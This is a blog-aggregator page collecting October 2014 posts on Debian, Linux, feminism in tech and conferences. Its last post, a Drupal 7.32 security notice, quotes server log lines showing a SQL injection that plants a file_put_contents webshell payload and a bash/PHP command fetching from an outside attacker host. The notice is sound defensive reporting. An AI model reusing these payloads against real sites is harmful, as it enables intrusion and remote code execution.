Planet DebianThorsten Alteholz: Key transition, move to stronger key

Finally I was able to do the enormous paperwork (no, it is not that much) to switch my old 1024D key to a new 4096R one. I was a bit afraid that there might be something bad happening, but my fear was without any reason. After the RT bug was closed, I could upload and sent signed emails to mailing lists. So thanks alot to everyone involved.

old key, 0xD362B62A54B99890

pub   1024D/54B99890 2008-07-23
      Key fingerprint = 36E2 EDDE C21F EC8F 77B8  7436 D362 B62A 54B9 9890
uid                  Thorsten Alteholz (...)
sub   4096g/622D94A8 2008-07-23

new key, 0xA459EC6715B0705F

pub   4096R/0xA459EC6715B0705F 2014-02-03
  Schl.-Fingerabdruck = C74F 6AC9 E933 B306 7F52  F33F A459 EC67 15B0 705F
uid                 [ uneing.] Thorsten Alteholz (...)
sub   4096R/0xAE861AE7F39DF730 2014-02-03
  Schl.-Fingerabdruck = B8E7 6074 5FF4 C707 1C77  870C AE86 1AE7 F39D F730
sub   4096R/0x96FCAC0D387B5847 2014-02-03
  Schl.-Fingerabdruck = 6201 FBFF DBBD E078 22EA  BB96 96FC AC0D 387B 5847

Geek FeminismLinkspam, fire, and dangerous things (19 October 2014)

Gamergate and online harassment

Other Stuff

  • Ada Lovelace, a Computer Programmer Ahead of Her Time | Mashable (October 15): Read more about the life of the “enchantress of numbers”
  • Ways Men In Tech Are Unintentionally Sexist | this is not a pattern (October 14): “These are little things. Things that many people do without thinking about them and certainly without intending anything by them. Things that individually are meaningless, but in aggregate set the tone of an entire community.”
  • The Malala you won’t hear about | The People’s Record (October 16): “This is the Malala the Western corporate media doesn’t like to quote. This is the Malala whose politics do not fit neatly into the neocolonialist, cookie-cutter frame of presentation. This is the Malala who recognizes that true liberation will take more than just education, that it will take the establishment of not just bourgeois political “democracy,” but ofeconomic democracy, of socialism.”
  • Where’s Thor When You Need Her? Women In Comics Fight An Uphill Battle | NPR (October 10): “On Facebook, women make up just under half of all self-identified comics fans. But even as the female audience grows, female creators for DC and Marvel, colloquially known as “the Big Two,” are still in the minority.”
  • Internal Memo: Microsoft CEO Satya Nadella sets new diversity plan after ‘humbling’ experience | GeekWire (October 15): “The memo, sent prior to a regular monthly Q&A session with employees, went on to outline a series of steps that Nadella says the company will be taking to improve diversity and inclusion across the company, including the company’s engineering and senior leadership teams.”
  • FiveThirtyEight Turns the Lidless Eye of Data Crunching to Gender Disparity in Superhero Comics Characters | The Mary Sue (October 15): “Hanley has been crunching the numbers on the gender make up of the folks who work on Marvel and DC comics for years, but FiveThirtyEight wanted to take a slightly different tack by looking at the characters who make up those comics in the first place.”
  • Mary Berners-Lee: Ada Lovelace Day Hero | equalitism (October 19): “Tim Berners-Lee’s mom, Mary Lee Woods was a badass mathematician/computer scientist before he was. Both of Tim’s parents worked on a team that developed programs in the School of Computer Science, University of Manchester Mark 1, Ferranti Mark 1 and Mark 1 Star computers.”
  • We link to a variety of sources, some of which are personal blogs.  If you visit other sites linked herein, we ask that you respect the commenting policy and individual culture of those sites.

    You can suggest links for future linkspams in comments here, or by using the “geekfeminism” tag on Pinboard, Delicious or Diigo; or the “#geekfeminism” tag on Twitter. Please note that we tend to stick to publishing recent links (from the last month or so).

    Thanks to everyone who suggested links.

    Planet Linux News: Speaker Feature: Pavel Emelyanov, Alasdair Allan

    Pavel Emelyanov

    Pavel Emelyanov

    Libcontainer: One lib to rule them all

    10:40 pm Friday 16th January 2015

    Pavel Emelyanov is a principal engineer at Parallels working on server virtualization projects. He holds a PhD degree in Applied Mathematics from the Moscow Institute of Physics and Technology. His speaking experience includes the talk on network namespaces at LinuxCon 2009 and the presentation of the Virtuozzo resource management at the joint memory management, storage and filesystem summit in April 2011.

    For more information on Pavel and his presentation, see here. You can follow him as @xemulp and don’t forget to mention #LCA2015.

    Alasdair Allan

    Alasdair Allan

    Open Source Protocols and Architectures to Fix the Internet of Things…

    3:40pm Friday 16th January 2015

    Alasdair is a scientist, author, hacker, tinkerer and co-founder of a startup working on fixing the Internet of Things. He spends much of his time probing current trends in an attempt to determine which technologies are going to define our future.

    He has also written articles for Make magazine. The latest entitled “Pick up your tools and get started!” posted 1 September 2014.

    For more information on Alasdair and his presentation, see here. You can follow him as @aallan and don’t forget to mention #LCA2015.

    Planet Linux AustraliaSridhar Dhanapalan: Twitter posts: 2014-10-13 to 2014-10-19

    Planet Linux AustraliaMark Terle: A preponderance of yak shaving….

    It is often observed that attempting to undertake one task begets another, with the corollary that two days later you’ve built a bikeshed painted in a multitude of colours.

    So, dear readers, this tale of woe begins with the need to update my blog to something useful after 18 months of neglect and more. I had been writing a travel blog from when I took some leave off work to wander the globe. For this task, a new more generic DNS entry and an upgrade to the WordPress installation and syndication with my Advogato blog. Easily accomplished and a sense of progress.

    This blog entry is going to be mostly a technical one. I’ll try incorporating more of real life in other entries.

    Great, now I can tell the world about my little project toying with Vagrant and Puppet.

    It is called “Browser In A Box”. It is up on Github

    It is very simple, a Vagrant file and a set of Puppet manifests/modules to launch Chromium in kiosk mode inside a VM to hit a certain URL. This is part of planned later work to look at creating a Vagrant development environment for Concerto.

    At this point, I got distracted … aside from the liberal upgrades of bash on various machines to address Shellshock

    Then I accidentally purchased a new Ultrabook. My previous netbook had been getting long in the tooth and it was time to upgrade. I ended up purchasing a Toshiba Satellite NB10, a reasonable processor Intel N2830, 4 Gig of RAM and 500 Gigs of spinning rust. Those are the nice bits.

    On the negatives, Crappy Toshiba keyboard layout with the ~ key in a stupid spot and a UEFI bios. It is now blatantly apparent why Matthew Garrett drinks copious quantities of gin.

    Special brickbats go to the Ubuntu installer for repartitioning and eating my Windows installation and recovery partition. (The option to install over my test Debian installation got over enthusiastic).  The wireless chipset (Atheros) has a known problem where it confuses the access point.

    The next distraction ended up being a fit of procastination in terms of rearranging my tiny apartment. I’ve now modelled it in a program called Sweet Home 3D. Easy and straight forward to use. Needs a few more furniture models, but perfectly functional. I shall use it again next time I move.

    Finally, we arrive at the the original task. I want to start syncing my calendars between various locations (written here for my benefit later).

    They are:

    • Work stream – From my Work (Exchange) to my private host (Radicale) to Google Calendar (which will get to my Android phone)
    • Personal stream – From my private host (Radicale) to Google Calendar (and back again)
    • Party stream – From Facebook’s ical export to my private host and Google Calendar

    In addition, various syncing of contacts but not my primary focus at the moment.

    It appears that syncevolution will do most of what I want here. The challenge revolves around how to get it working. Ultimately, I want to have this live headless hosted on a virtual machine not running a desktop.

    In a fit of enthusiasm, I decided upon attempting to build it from source as opposed to using the packages provided from the upstream (to avoid dragging in unnecessary dependencies.

    I need to build from HEAD due to recent code added to syncevolution to support the change in Google’s CALDAV API to be behind OAuth V2.

    This was not an overly successful exercise, I ended up getting something built but it didn’t ultimately work.

    Problems encountered were:

    • libwbxml2 – The upstream at is down. There appears to be forks, so playing the game of guessing the current head/release version.
    • activesyncd – Build system is currently broken in parts. There appears to be bit rot around the evolution bindings as the evolution API has changed

    I gave up at that point. I’ve since spun up a different virtual machine with Debian Jessie and an install of Gnome. The packages from the syncevolution upstream installed cleanly, but have yet to work out the incarnations to make it work. However, that my friends is a story for a later blog entry…

    Planet Linux News: Multimedia and Music Miniconf - Call for Papers

    The Multimedia and Music Miniconf at LCA2015 will be held in Auckland, New Zealand, on Monday 12 January 2015. We are pleased to formally open the miniconf's Call for Papers. Submissions are encouraged from anyone with a story to tell which is related to open software for multimedia or music.

    Examples of possible presentations include:

    • demonstrations of multimedia content authored using Open Source programs
    • audio recording examples
    • Open Source games
    • video and image editing on Linux
    • new multimedia software being written
    • multimedia web APIs and applications
    • unusual uses of Open Source multimedia software
    • codec news

    In addition, we are planning to hold an informal jam session at the end of the Miniconf, giving community members a change to showcase their compositions and multimedia creations. Expressions of interest for this are also invited. If musical instruments are required it is preferable if participants arranged this themselves, but with sufficient lead time it might be possible to arrange a loan from locals in Auckland.

    The miniconf website at has further details about the miniconf.

    To submit a proposal or for further information, please email Jonathan Woithe ( or Silvia Pfeiffer (

    Jonathan Woithe and Silvia Pfeiffer

    (Multimedia and Music miniconf organisers)

    Planet DebianBenjamin Mako Hill: Another Round of Community Data Science Workshops in Seattle

    Pictures from the CDSW sessions in Spring 2014Pictures from the CDSW sessions in Spring 2014

    I am helping coordinate three and a half day-long workshops in November for anyone interested in learning how to use programming and data science tools to ask and answer questions about online communities like Wikipedia, free and open source software, Twitter, civic media, etc. This will be a new and improved version of the workshops run successfully earlier this year.

    The workshops are for people with no previous programming experience and will be free of charge and open to anyone.

    Our goal is that, after the three workshops, participants will be able to use data to produce numbers, hypothesis tests, tables, and graphical visualizations to answer questions like:

    • Are new contributors to an article in Wikipedia sticking around longer or contributing more than people who joined last year?
    • Who are the most active or influential users of a particular Twitter hashtag?
    • Are people who participated in a Wikipedia outreach event staying involved? How do they compare to people that joined the project outside of the event?

    If you are interested in participating, fill out our registration form here before October 30th. We were heavily oversubscribed last time so registering may help.

    If you already know how to program in Python, it would be really awesome if you would volunteer as a mentor! Being a mentor will involve working with participants and talking them through the challenges they encounter in programming. No special preparation is required. If you’re interested, send me an email.


    Planet DebianSteve Kemp: On the names we use in email

    Yesterday I received a small rush of SPAM mails, all of which were 419 scams, and all of them sent by "Mrs Elizabeth PETERSEN".

    It struck me that I can't think of ever receiving a legitimate mail from a "Mrs XXX [YYY]", but I was too busy to check.

    Today I've done so. Of the 38,553 emails I've received during the month of October 2014 I've got a hell of a lot of mails with a From address including a "Mrs" prefix:

    "Mrs.Clanzo Amaki" <>
    "Mrs Sarah Mamadou"<>
    "Mrs Abia Abrahim" <>
    "Mrs. Josie Wilson" <>
    "Mrs. Theresa Luis"<>

    There are thousands more. Not a single one of them was legitimate.

    I have one false-positive when repeating the search for a Mr-prefix. I have one friend who has set his sender-address to "Mr Bob Smith", which always reads weirdly to me, but every single other email with a Mr-prefix was SPAM.

    I'm not going to use this in any way, since I'm happy with my mail-filtering setup, but it was interesting observation.

    Names are funny. My wife changed her surname post-marriage, but that was done largely on the basis that introducing herself as "Doctor Kemp" was simpler than "Doctor Foreign-Name", she'd certainly never introduce herself ever as Mrs Kemp.

    Trivia: In Finnish the word for "Man" and "Husband" is the same (mies), but the word for "Woman" (nainen) is different than the word for "Wife" (vaimo).

    LongNowThe Manual for Civilization takes The Knight Foundation News Challenge

    Manual for Civilization Knight News Challenge

    What captures your imagination about the future of libraries?

    That’s the question asked by The Knight Foundation in an open call for innovative library projects. There have been 680 proposals from around the country, and only a few days remain to give feedback and “Applaud” your favorites.  We think our Manual for Civilization project fits well with The Knight Foundation’s News Challenge funding goal:

    We view libraries as key for improving Americans’ ability to know about and to be involved with what takes place around them. The library has been a vital part of our communities for centuries—as keepers of public knowledge, spaces for human connection, educators for the next generations of learners. While habits are changing, those needs have not. We want to discover projects that help carry the values of libraries into the future.

    Take a moment to read our proposal, comment, and click the Applause button to show your support for the Manual for Civilization. Many projects will be funded to fulfill the News Challenge’s aim of [accelerating] media innovation by funding breakthrough ideas in news and information. Your applause could help the Manual be one of them.

    The Manual for Civilization is a crowd-curated library of the 3500 books most essential to sustain or rebuild civilization. Knight Foundation funds will help us complete our collection of books–including many rare, hard-to-find titles. It would also support live events to engage the community and online initiatives providing broader access to the project. Read more on the News Challenge website.

    Planet DebianErich Schubert: Beware of trolls - do not feed

    A particularly annoying troll has been on his hate crusade against systemd for months now.
    Unfortunately, he's particularly active on Debian mailing lists (but apparently also on Ubuntu and the Linux Kernel mailing list) and uses a tons of fake users he keeps on setting up. Our listmasters have a hard time blocking all his hate, sorry.
    Obviously, this is also the same troll that has been attacking Lennart Poettering.
    There is evidence that this troll used to go by the name "MikeeUSA", and has quite a reputation with anti-feminist hate for over 10 years now.
    Please, do not feed this troll.
    Here are some names he uses on YouTube: Gregory Smith, Matthew Bradshaw, Steve Stone.
    Blacklisting is the best measure we have, unfortunately.
    Even if you don't like the road systemd is taking or Lennart Poetting personall - the behaviour of that troll is unacceptable to say the least; and indicates some major psychological problems... also, I wouldn't be surprised if he is also involved in #GamerGate.
    See this example (LKML) if you have any doubts. We seriously must not tolerate such poisonous people.
    If you don't like systemd, the acceptable way of fighting it is to write good alternative software (and you should be able to continue using SysV init or openRC, unless there is a bug, in Debian - in this case, provide a bug fix). End of story.

    Sociological ImagesChart of the Week: Politicians Following, Not Leading on Same-Sex Marriage

    For those of us in favor of same-sex marriage rights, it’s been an exciting few years. Politicians and legislatures have been increasingly tipping toward marriage equality. Lots of us are commending the powerful and high-profile individuals who have decided to support the cause.

    But, let’s not be too grateful.

    A figure at xkcd puts this in perspective. It traces four pieces of data over time: popular approval and legalization of both interracial marriage and same-sex marriage. It shows that the state-by-state legalization of same-sex marriage is following public opinion, whereas the legalization of interracial marriage led public opinion.


    There’s a reason that we look back at Civil Rights legislation and see leadership. Politicians, litigators, and activists were pushing for rights that the public wasn’t necessarily ready to extend. In comparison, today’s power brokers appear to be following public opinion, changing their mind because the wind is suddenly blowing a new way.

    I’m sure there are politicians out there taking risks at the local level. On the whole, though, this doesn’t look like leadership, it looks like political expedience.

    Lisa Wade is a professor of sociology at Occidental College and the co-author of Gender: Ideas, Interactions, Institutions. You can follow her on Twitter and Facebook.

    (View original at

    Planet Linux AustraliaAndrew Donnellan: KDE 4/Plasma system tray not displaying applications, notifications appearing twice

    So I was trying to get RSIBreak working on my machine today, and for some reason it simply wasn’t displaying an icon in the Plasma system tray as it was meant to.

    It took some searching around, but eventually I came across a comment on a KDE bug report that had the answer.

    I opened up ~/.kde/config/plasma-desktop-appletsrc, searched for “systemtray“, and lo and behold, there were two Containments, both using the systemtray plugin. It seems that at some point during the history of my KDE installation, I ended up with two system trays, just with one that wasn’t visible.

    After running kquitapp plasma to kill the desktop, I removed the first systemtray entry (I made an educated guess and decided that the first one was probably the one I didn’t want any more), saved the file and restarted Plasma.

    Suddenly, not only did RSIBreak appear in my system tray, but so did a couple of other applications which I forgot I had installed. This also fixed the problem I was having with all KDE notifications appearing on screen twice, which was really rather annoying and I’m not sure how I coped with it for so long…

    Filed under: Linux, Uncategorized Tagged: KDE, linux, Linux Tips

    Planet Linux AustraliaAndrew Donnellan: The r8169 driver and mysterious network problems

    A few months ago, a friend of mine was having a problem. When he hooked up his Toshiba laptop to the Ethernet port in his bedroom, it would work under Windows, but not under Linux. When he hooked it up to the port in the room next door, it would work under both.

    I headed over with my Samsung Ultrabook, and sure enough – it worked fine under Windows, but not Linux, while the room next door worked under both.

    As it turns out, both our laptops used Realtek RTL8168-series Ethernet controllers, which are normally handled just fine by the r8169 driver, which can be found in the kernel mainline. However, Realtek also releases a r8168 driver (available in Debian as r8168-dkms). Upon installing that, everything worked fine.

    (At some point I should probably go back and figure out why it didn’t work under r8169 so I can file a bug…)

    Filed under: Hardware, Linux Tagged: Computing, Drivers, linux, Linux Tips

    Don MartiSnapchat ads and committing to non-targeting

    Recent Snapchat blog, announcing ads:

    We want to see if we can deliver an experience that’s fun and informative, the way ads used to be, before they got creepy and targeted. It’s nice when all of the brilliant creative minds out there get our attention with terrific content.

    That's a great idea, and ties in with what I've been saying all along about the targeted ad problem.

    But I'm not optimistic. Snapchat is still running on a mobile phone, running within an environment that's either problematic or outright privacy-hostile. If Snapchat can't commit to its core feature, the idea that photos disappear after sending, how can the company credibly commit to less creepy, more valuable advertising?

    It would be a huge win for Snapchat if they could pull it off. But I doubt that a single app can do it.

    Signalful ads are an emergent benefit from media that tend to build user confidence through tracking resistance. Non-creepiness can't be declared, it has to be discovered.

    Planet DebianRhonda D'Vine: Trans Gender Moves

    Yesterday I managed to get the last ticket from the waitinglist for the premiere of Trans Gender Moves. It is a play about the lives of three people: A transman, a transwoman and an intersexual person. They tell stories from their life, their process of finding their own identity over time. With in parts amusing anecdotes and ones that gets you thinking I can just wholeheartly encourage you to watch it if you have the chance to. It will still be shown the next few days, potentially extending depending on the requests for tickets, from what I've been told by one of the actors.

    The most funny moment for me though was when I was talking with one of the actors about that it really touched me that I was told that one of them will be moving into into the same building I will be moving into in two year's time. Unfortunately that will be delayed a bit because they found me thinks field hamster or the likes in the ground and have to wait until spring for them to move. :/

    /personal | permanent link | Comments: 5 | Flattr this

    Planet Linux AustraliaLev Lafayette: PRINCE2 Checklist and Flowchart

    Recently a simple statement of PRINCE2 governance structures was provided. From this it is possible to derive a checklist for project managers to tick off, just to make sure that everything is done. Please note that this checklist is tailored and combines some functions. For example, there is no Business Review Plan as it is argued that any sensible project should incorporate these into the Business Case and the Project Plan.

    A simple graphic is provided to assist with this process

    read more

    Planet Linux AustraliaLev Lafayette: File Creation Time in Linux

    Linux offers most of the expected file attributes from the command line, including the owner of a file, the group, the size, the date modified and name. However often users want find out when a file was created. This requires a little bit of extra investigation.

    read more

    Worse Than FailureAnnouncements: The New Look is Here

    As you may have noticed, the site looks quite a bit different! As I mentioned back in March, it's been almost seven years since the look and feel of The Daily WTF has been updated, and I was getting pretty tired of the "2003ish" vibe the site had.

    You guys gave some fantastic feedback to help guide the new design, and in July I shared a preview look. After some more feedback - both on the GitHub issue tracker and the forums - we put on the finishing touches and launched the site this evening.

    Of course, it's not perfect - there are a few issues I found when writing this article, and I'm sure we'll find a lot more. But it's a big improvement and, because all of teh codez are on GitHub, it'll be a lot easier to fix things. So if you notice any glitches or have ideas for improvements, please post an issue, submit a pull request, post something in this article's discussion, or contact me directly.


    CryptogramFriday Squid Blogging: 1,057 Squid T-Shirts

    That's a lot.

    As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

    Commenting has been broken for the past few days. We hope to get it fixed on Monday.

    Planet Linux AustraliaErik de Castro Lopo: Haskell : A neat trick for GHCi

    Just found a really nice little hack that makes working in the GHC interactive REPL a little easier and more convenient. First of all, I added the following line to my ~/.ghci file.


    All that line does is define a GHC_INTERACTIVE pre-processor symbol.

    Then in a file that I want to load into the REPL, I need to add this to the top of the file:

      {-# LANGUAGE CPP #-}

    and then in the file I can do things like:

      #ifdef GHC_INTERACTIVE
      import Data.Aeson.Encode.Pretty
      prettyPrint :: Value -> IO ()
      prettyPrint = LBS.putStrLn . encodePretty

    In this particular case, I'm working with some relatively large chunks of JSON and its useful to be able to pretty print them when I'm the REPL, but I have no need for that function when I compile that module into my project.

    TEDReflections on TEDGlobal 2014, from the community

    TEDGlobal 2014 brought our conference to the tropics. Here's what the community had to say following this conference all about the theme "South!" Photo: Ryan Lash

    TEDGlobal 2014 brought our conference to the tropics. Here’s what the community had to say following this conference all about the theme “South!” Photo: Ryan Lash

    One of the best things about a week after a conference? The chance to reflect on the experience. In the last week, several TEDGlobal 2014 attendees and community members have shared their thoughts throughout the blogiverse. Below, some highlights:

    Steve Song shared his experience preparing to speak at TED in a post called “Steve and TED’s Excellent Adventure.” “Have you ever found yourself at a party where you felt like if someone discovered who you really were, you would be ejected immediately? That’s a little bit how I’ve felt for the last six months since my invitation to speak at TEDGlobal 2014,” he writes in a wonderful diary. “My dominant emotion in coming away from TEDGlobal — a powerful urge to kick things up a notch.  Several notches, actually.”

    Emmanuelle Roques, an organizer of TEDxBordeaux, used the conference as way to meet people in Rio de Janeiro, Brazil. Rather than watch from the theater, she traveled each day to a different collaborative space that was participating in TEDGlobal Para Todos to watch the livestream with whoever happened to be there. Read her diary.

    Igor Botelho Bernardes calls TEDGlobal a “life-changing” experience. On his site, (aka “The good news”), he shared a roundup of the Brazilian speakers who took the stage and teased out 15 ideas that he thinks could revolutionize the southern hemisphere. (In Portuguese.)

    Fabiano Serfaty wrote about his TEDGlobal experience through his blog for Veja magazine. Read his highlights,  and an interview with TED Fellow Joe Landolina, who talked about his incredible gel that stops severe bleeding. (In Portuguese.)

    Luke Barbara shares how he crowdfunded his way to TEDGlobal 2014.

    Gabriel Borges posted his diary of the event through Read his recaps of day 1, day 2, and day 3 – or skip on over to his final thoughts. (In Portuguese.) 

    Rishad Tobaccowala of Publicis Groupe revealed the three main takeaways that he saw in the TEDGlobal program, including the many ways that the intersection of mobile technology and cloud computing is having an impact.

    Paul Robert Reid admits that he has “Post #TEDGlobal blues.” Another fun read from his site: his recap of visiting Jardim Gramacho, aka Rio’s rubbish dump, where artist Vik Muniz found materials for his work “Waste Land.” 

    And if you too have blogged about watching TED Live or going to the conference — share a link in the comments!

    LongNowMark Lynas: 9 Planetary Boundaries, Finessing the Anthropocene — Seminar Flashback

    “The Holocene is over and welcome to the Anthropocene our very uniquely human geological era.” In March 02012 environmental activist and author Mark Lynas gave a sobering assessment of Earth in the Anthropocene.

    Lynas offers a framework for tracking the health of our planet, outlining nine measurable “boundaries” that if crossed threaten the well-being of humans on Earth. And some already had been crossed in 02012. These systems go beyond climate and biodiversity to measures like ocean acidification, atmospheric aerosols, and excess nitrogen in agriculture.

    Long Now members can watch this video here. The audio is free for everyone on the Seminar page and via podcastLong Now members can see all Seminar videos in HD. Video of the 12 most recent Seminars is also free for all to view.

    <iframe frameborder="no" height="450" scrolling="no" src=";auto_play=false&amp;hide_related=false&amp;show_comments=true&amp;show_user=true&amp;show_reposts=false&amp;visual=true" width="100%"></iframe>

    From Stewart Brand’s summary of the talk (in full here):

    We’ve raised the temperature of the Earth system, reduced the alkalinity of the oceans, altered the chemistry of the atmosphere, changed the reflectivity of the planet, hugely affected the distribution of freshwater, and killed off many of the species that share the planet with us. [...] Some of those global alterations made by humans may be approaching tipping points—thresholds—that could destabilize the whole Earth system.

    Mark Lynas‘ books include Six Degrees (which Stewart Brand called one of the finest books written on climate), The God Species: How the Planet Can Survive the Age of Humans, and most recently Nuclear 2.0: Why a Green Future Needs Nuclear Power (02014). He is a member of the World Economic Forum’s Global Agenda Council on Decarbonising Energy, which focuses on sustainable energy to mitigate climate change.

    Mark Lynas: Nine Planetary Boundaries, Finessing the Anthropocene

    The Seminars About Long-term Thinking series began in 02003 and is presented each month live in San Francisco. It is curated and hosted by Long Now’s President Stewart Brand. Seminar audio is available to all via podcast.

    Everyone can watch full video of the 12 most recent Long Now Seminars. Long Now members can watch this video in full—you must be logged in to the site—and the full ten years of Seminars in HD. Membership levels start at $8/month and include lots of benefits.

    You can join Long Now here.

    Geek FeminismBuffy the Linkspam Slayer

    • Anita Sarkeesian explains why she canceled USU lecture | Salt Lake City Tribune (October 16): “A nationally known feminist media critic said Wednesday that “it would be irresponsible” to give a lecture amidst mass shooting threats at Utah State University, knowing that police would not screen for weapons at the door. In a phone interview from San Francisco, Anita Sarkeesian said she canceled Wednesday’s lecture not because of three death threats — one of which promised “the deadliest school shooting in American history” — but because firearms would be allowed in spite of the threats.”
    • When gun rights trump public safety | Mary Elizabeth Williams (October 15): “It’s one thing to accept and understand that plenty of reasonable and responsible people own guns and that is their constitutional right. It is another to be so outrageously afraid of legitimate and sane restrictions that you have a situation in which it is entirely permissible to carry a loaded weapon into an event that carries a threat that the people attending it will “die screaming.””
    • The Threats Against Anita Sarkeesian Expose The Darkest Aspects of Online Misogyny | Maureen Ryan (October 15): “The question that’s been haunting many observers for weeks is now right out in the open in the wake of the latest threats leveled at Sarkeesian: Is someone going to have to die for things to change?”
    • #Gamergate Trolls Aren’t Ethics Crusaders; They’re a Hate Group | Jezebel (October 13): “I set about locking down accounts, emailing professors, contacting campus safety, and calling family. It was an exhausting process, but I considered it necessary. The attack could get out of hand. I mentioned offhand to my sister, about two hours in, that “it was getting to be my turn anyways,” to nonchalantly minimize my hurt. That was the moment I broke down. I realized just how much I’d internalized the presumed process: if you’re even asking about equality or diversity in games, being shouted down in a traumatizing manner is now a mandatory step that you have to sit back and endure.”
    • Sweatin’ the Small Stuff, of, Beware Your Throwaway Jokes About Middle-Aged Women in Magic | One General to Rule them All (October 14): “I dare Wizards to give us a major female Magic character (read: Planeswalker) in the next couple of sets who doesn’t have a body that wouldn’t look out of place on a runway or the cover of Playboy. Tamiyo, the Moon Sage was a great start, but that was three blocks ago. Hell, at this point, I’ll take more than one female Planeswalker per set.”
    • AdaCamp: Spending Time with Women in Open Source and Technology | Zara Rahman (October 13): “There were some sessions that really opened my eyes to another area of this ‘open’ bubble- for example, talking about women in open source. Most of the women there were coders, who had contributed to open source code projects; and despite my having read accounts of abuse and harassment within the open source community fairly regularly before, the severity of the situations they face, really hit home for me during this session.
    • Ada Lovelace Day: Meet the 6 women who gave you ‘the computer’ | The Register (October 14): “All six are now sadly no longer with us – Bartik was the last to pass away. But their achievements were profound, not just in terms of inadvertently cementing the name “computer”. In the absence of manuals literally working out how to use this giant, the team of six installed computer programs working from sheets of paper, nimbly unplugging and replugging a rat’s nest of cables and resetting switches.”
    • Don’t Be Fooled by Apple and Facebook, Egg Freezing Is Not a Benefit | The Daily Beast (October 15): “Of all the women Snyder surveyed, nearly 90 percent of them said they did not plan on returning to the tech industry in the future. The incompatibility between motherhood and tech, it seems, runs far deeper than the timing of pregnancy alone. And the problem is so severe that the women who leave almost never want to come back. In this context, the decision to cover egg freezing reads as Silicon Valley at its most typical, deploying a hasty technological stopgap for a cultural problem.”
    • Tech’s Meritocracy Problem | Medium (October 10): “Engineers love to be skeptics — it’s time to bring our skepticism to the concept of meritocracy. If we can be skeptical enough about our own ability to detect merit, and balance it with more objective measurement or outright mitigatory adjustments — we’ll come closer to resembling an actual meritocracy.”
    • HERoes: Genevieve Valentine | Comicosity (October 2): “From journalist to award winning novelist, Genevieve Valentine is now channeling her inner crime boss. She is providing a new voice to a suited up Selina Kyle, starting with this month’s issue of Catwoman. She tells Comicosity about switching the role of female characters in comics and the importance of reader perspective while consuming.”
    •  Comic Books are Still Made by Men, For Men, and About Men | FiveThirtyEight (October 13): “But these recent advancements don’t make up for the fact that women have been ignored in comic books for decades. And they still don’t bring women anywhere close to parity: Females make up about one in four comic book characters. Among comic-creators, the numbers are even more discouraging. Tim Hanley, a comics historian and researcher, analyzes who’s behind each month’s batch of releases, counting up writers, artists, editors, pencilers and more. In August, Hanley found that men outnumbered women nine-to-one behind the scenes at both DC and Marvel.”
    • Life, Engineered: How Lynn Conway reinvented her world and ours | University of Michigan (October 8): “Ten years earlier, Conway had been one of the first Americans to undergo a modern gender transition. It had cost her a job and her family. Once she established herself as a woman, she kept the past a secret. Conway stayed behind the scenes as much as she could. As a result, so did many of her achievements.”

    We link to a variety of sources, some of which are personal blogs.  If you visit other sites linked herein, we ask that you respect the commenting policy and individual culture of those sites.

    You can suggest links for future linkspams in comments here, or by using the “geekfeminism” tag on Pinboard, Delicious or Diigo; or the “#geekfeminism” tag on Twitter. Please note that we tend to stick to publishing recent links (from the last month or so).

    Thanks to everyone who suggested links.

    Planet DebianMartin Pitt: Ramblings from LinuxCon/Plumbers 2014

    I’m on my way home from Düsseldorf where I attended the LinuxCon Europe and Linux Plumber conferences. I was quite surprised how huge LinuxCon was, there were about 1.500 people there! Certainly much more than last year in New Orleans.

    Containers (in both LXC and docker flavors) are the Big Thing everybody talks about and works with these days; there was hardly a presentation where these weren’t mentioned at all, and (what felt like) half of the presentations were either how to improve these, or how to use these technologies to solve problems. For example, some people/companies really take LXC to the max and try to do everything in them including tasks which in the past you had only considered full VMs for, like untrusted third-party tenants. For example there was an interesting talk how to secure networking for containers, and pretty much everyone uses docker or LXC now to deploy workloads, run CI tests. There are projects like “fleet” which manage systemd jobs across an entire cluster of containers (distributed task scheduler) or like which auto-build packages from each commit of projects.

    Another common topic is the trend towards building/shipping complete (r/o) system images, atomic updates and all that goodness. The central thing here was certainly “Stateless systems, factory reset, and golden images” which analyzed the common requirements and proposed how to implement this with various package systems and scenarios. In my opinion this is certainly the way to go, as our current solution on Ubuntu Touch (i. e. Ubuntu’s system-image) is far too limited and static yet, it doesn’t extend to desktops/servers/cloud workloads at all. It’s also a lot of work to implement this properly, so it’s certainly understandable that we took that shortcut for prototyping and the relatively limited Touch phone environment.

    On Plumbers my main occupations were mostly the highly interesting LXC track to see what’s coming in the container world, and the systemd hackfest. On the latter I was again mostly listening (after all, I’m still learning most of the internals there..) and was able to work on some cleanups and improvements like getting rid of some of Debian’s patches and properly run the test suite. It was also great to sync up again with David Zeuthen about the future of udisks and some particular proposed new features. Looks like I’m the de-facto maintainer now, so I’ll need to spend some time soon to review/include/clean up some much requested little features and some fixes.

    All in all a great week to meet some fellows of the FOSS world a gain, getting to know a lot of new interesting people and projects, and re-learning to drink beer in the evening (I hardly drink any at home :-P).

    If you are interested you can also see my raw notes, but beware that there are mostly just scribbling.

    Now, off to next week’s Canonical meeting in Washington, DC!

    Planet DebianGunnar Wolf: #Drupal7 sites under attack — Don't panic!

    Two days ago, Drupal announced version 7.32 was available. This version fixes a particularly nasty bug, allowing a SQL injection at any stage of interaction (that means, previous to the authentication taking place).

    As soon as I could, I prepared and uploaded Debian packages for this — So if you run a Debian-provided Drupal installation, update now. The updated versions are:

    sid / jessie (unstable / testing)
    wheezy (stable)
    squeeze-backports (oldstable)

    And, as expected, I'm already getting several attacks on my sites. Good thing that will help you anyway: Even though it won't prevent the attack from happening, if you use suhosin, several of the attacks will be prevented. Yes, sadly suhosin has not been in a stable Debian release since Wheezy, but still... :-|

    Partial logs. This looks like a shellcode being injected as a file created via the menu_router mechanism (shellcode snipped):

    1. Oct 16 15:22:21 lafa suhosin[3723]: ALERT - configured request variable
    2. total name length limit exceeded - dropped variable 'name[0; INSERT INTO
    3. `menu_router` (`path`, `load_functions`, `to_arg_functions`, `description`,
    4. `access_callback`, `access_arguments`) VALUES ('deheky', '', '', 'deheky',
    5. 'file_put_contents',
    6. +0x613a323a7b693a303b733a32323a226d6f64756c65732f64626c6f672f746e777(...)
    7. );;# ]' (attacker '', file '/usr/share/drupal7/index.php')

    While the previous one is clearly targetting this particular bug, I'm not sure about this next one: It is just checking for some injection viability before telling me its real intentions:

    1. Oct 17 10:26:04 lafa suhosin[3644]: ALERT - configured request variable
    2. name length limit exceeded - dropped variable
    3. '/bin/bash_-c_"php_-r_\"file_get_contents(
    4. 'http://hello_hacked_jp/hello/?l'
    5. (attacker '', file '/usr/share/drupal7/index.php')

